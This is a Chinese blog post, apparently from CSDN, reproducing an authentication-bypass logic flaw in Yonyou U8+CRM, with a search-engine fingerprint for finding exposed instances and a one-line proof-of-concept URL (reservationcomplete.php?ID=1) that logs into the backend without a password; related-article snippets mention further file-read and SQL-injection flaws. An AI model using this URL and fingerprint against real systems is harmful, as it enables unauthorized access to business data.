用友U8CRM reservationcomplete.php 逻辑漏洞复现

最新推荐文章于 2024-08-13 14:54:57 发布
最新推荐文章于 2024-08-13 14:54:57 发布
阅读量308 收藏 2
点赞数 4
文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/136848361
版权

前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、产品简介

用友U8+CRM是一款专为企业提供客户关系管理解决方案的软件。它通过整合多种网络化、低成本营销手段和沟通方式,帮助企业建立与客户之间通畅的交流平台。

二、漏洞描述

该系统存在逻辑漏洞,在不知道密码的情况下可以登录系统后台

三、影响范围

未知

四、复现环境

鹰图:
app.name=“用友 CRM”

五、漏洞复现

1.访问存在漏洞的网站
在这里插入图片描述

2.POC

ip:port/background/reservationcomplete.php?ID=1

如果出现空白页面则表示可能存在该漏洞
在这里插入图片描述
3.再次请求该网址,即可自动登录后台
在这里插入图片描述

六、修复建议

暂时关闭互联网暴露面访问的权限,及时更新平台系统

参考链接

https://blog.csdn.net/weixin_51641247/article/details/136509904

明丨通
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友U8+CRM help2 任意文件读取漏洞复现
0xSec
12-21 1338
用友 U8 CRM客户关系管理系统help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。
漏洞复现用友畅捷CRM存在SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
05-06 1115
用友畅捷通T-CRM用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 " 提升营销能力,网罗天下商机"。用友畅捷CRM存在SQL注入漏洞,攻击者可通过使用工具获取数据库相关敏感信息,拿到服务器控制权限。
用友 CRM help2.php存在任意文件读取漏洞
3tefanie丶zhou的博客
12-19 727
【天底下喜欢讲道理的人,大致可以分为两种,一种是为了让自己心里好受,一种是希望让世道好过。】
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 559
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
用友 U8+CRM V13-V16.5 任意文件读取漏洞
WuYSec的博客
06-14 558
用友U8 CRM 客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友U8 CRM 客户关系管理系统存在任意文件读取漏洞。无垠Sec专注安全研究,包括但不限于代码审计、漏洞挖掘、思路分享等。目前仅需50,你就能得到常见系统1day漏洞POC、代码审计、漏洞分析、漏洞挖掘等。此漏洞影响 V16.5, V16.1, V16.0, V15.1, V15.0, V13版本。app="用友-U8CRM" || title="用友U8CRM"
用友 CRM reservationcomplete.php存在逻辑漏洞
3tefanie丶zhou的博客
01-09 538
【人间处处,春雨杏花急急落,车马春山慢慢行。】
用友php漏洞,用友CRM注入漏洞(无需登录通杀所有版本)
weixin_34977368的博客
04-10 1191
用友TurboCRM存在通用sql注入。http://**.**.**.**:8081/login/login.php如下图找到找回密码页访问http://**.**.**.**:8081/login/changepswd.php?orgcode=1&loginname=system输入信息抓包POST /login/changepswd.php?orgcode=1&loginna...
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 598
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理的用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
0day!用友CRM存在日志信息泄露漏洞-未公开漏洞
weixin_43167326的博客
02-27 584
CRM首先是一种管理理念,核心是将企业的客户作为企业最重要的资源,通过完善的客户服务和深入的客户分析来满足客户的需求,在向客户不断提供最大价值的同时,实现企业的价值,实现“双赢”。
用友u8实验报告.pdf
04-05
用友u8实验报告.pdf用友u8实验报告.pdf用友u8实验报告.pdf用友u8实验报告.pdf用友u8实验报告.pdf用友u8实验报告.pdf
用友U8C企业报表.pptx
02-16
### 用友U8C企业报表相关知识点 #### 一、业务流程简介 在了解用友U8C企业报表之前,我们首先需要明确其业务流程。主要包括以下几个环节: 1. **布置表样**:根据企业的具体需求进行报表样式的设计与布局。 2. **...
用友U8C合并报表.ppt
02-16
### 用友U8C合并报表知识要点 #### 一、合并报表概念与应用场景 - **定义**: 合并报表是指以母公司和其子公司组成的集团为一个会计主体,基于各子公司独立编制的个别会计报表,抵消集团内部交易的影响后编制的报表...
用友U8C企业报表.mp4
02-16
用友U8C企业报表.mp4
用友U8C补丁说明.pdf
02-16
用友U8C补丁说明
漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台
weixin_51641247的博客
03-06 746
漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台
用友php漏洞,用友漏洞存在目录整理 | CN-SEC 中文网
weixin_34637293的博客
04-10 1288
/core/public/singleplandetail.jsp /epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_...
用友U8+ CRM任意文件上传、任意文件读取 实战
m0_43397796的博客
02-24 2127
用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 8313
用友OA/NC/NCCloud漏洞集合
文件上传-.user.ini利用
最新发布
feiwujiushiwo的博客
08-13 241
php.ini是php的全局配置文件,对整个web服务起作用.user.ini和.htaccess都是目录的配置文件.user.ini是用户自定义的php.in理解为包含文件。
用友u8 cloud 反序列化rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现存在反序列化远程命令执行(RCE)漏洞。要复现这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,然后将这个数据传递给U8 Cloud系统,让系统进行反序列化操作。当系统对这个数据进行反序列化时,就会触发我们植入的恶意代码,从而实现远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了反序列化漏洞来实现远程命令执行。 当然,为了成功复现这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列化数据。在复现过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商反馈该漏洞,以便及时修复和加强系统安全防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值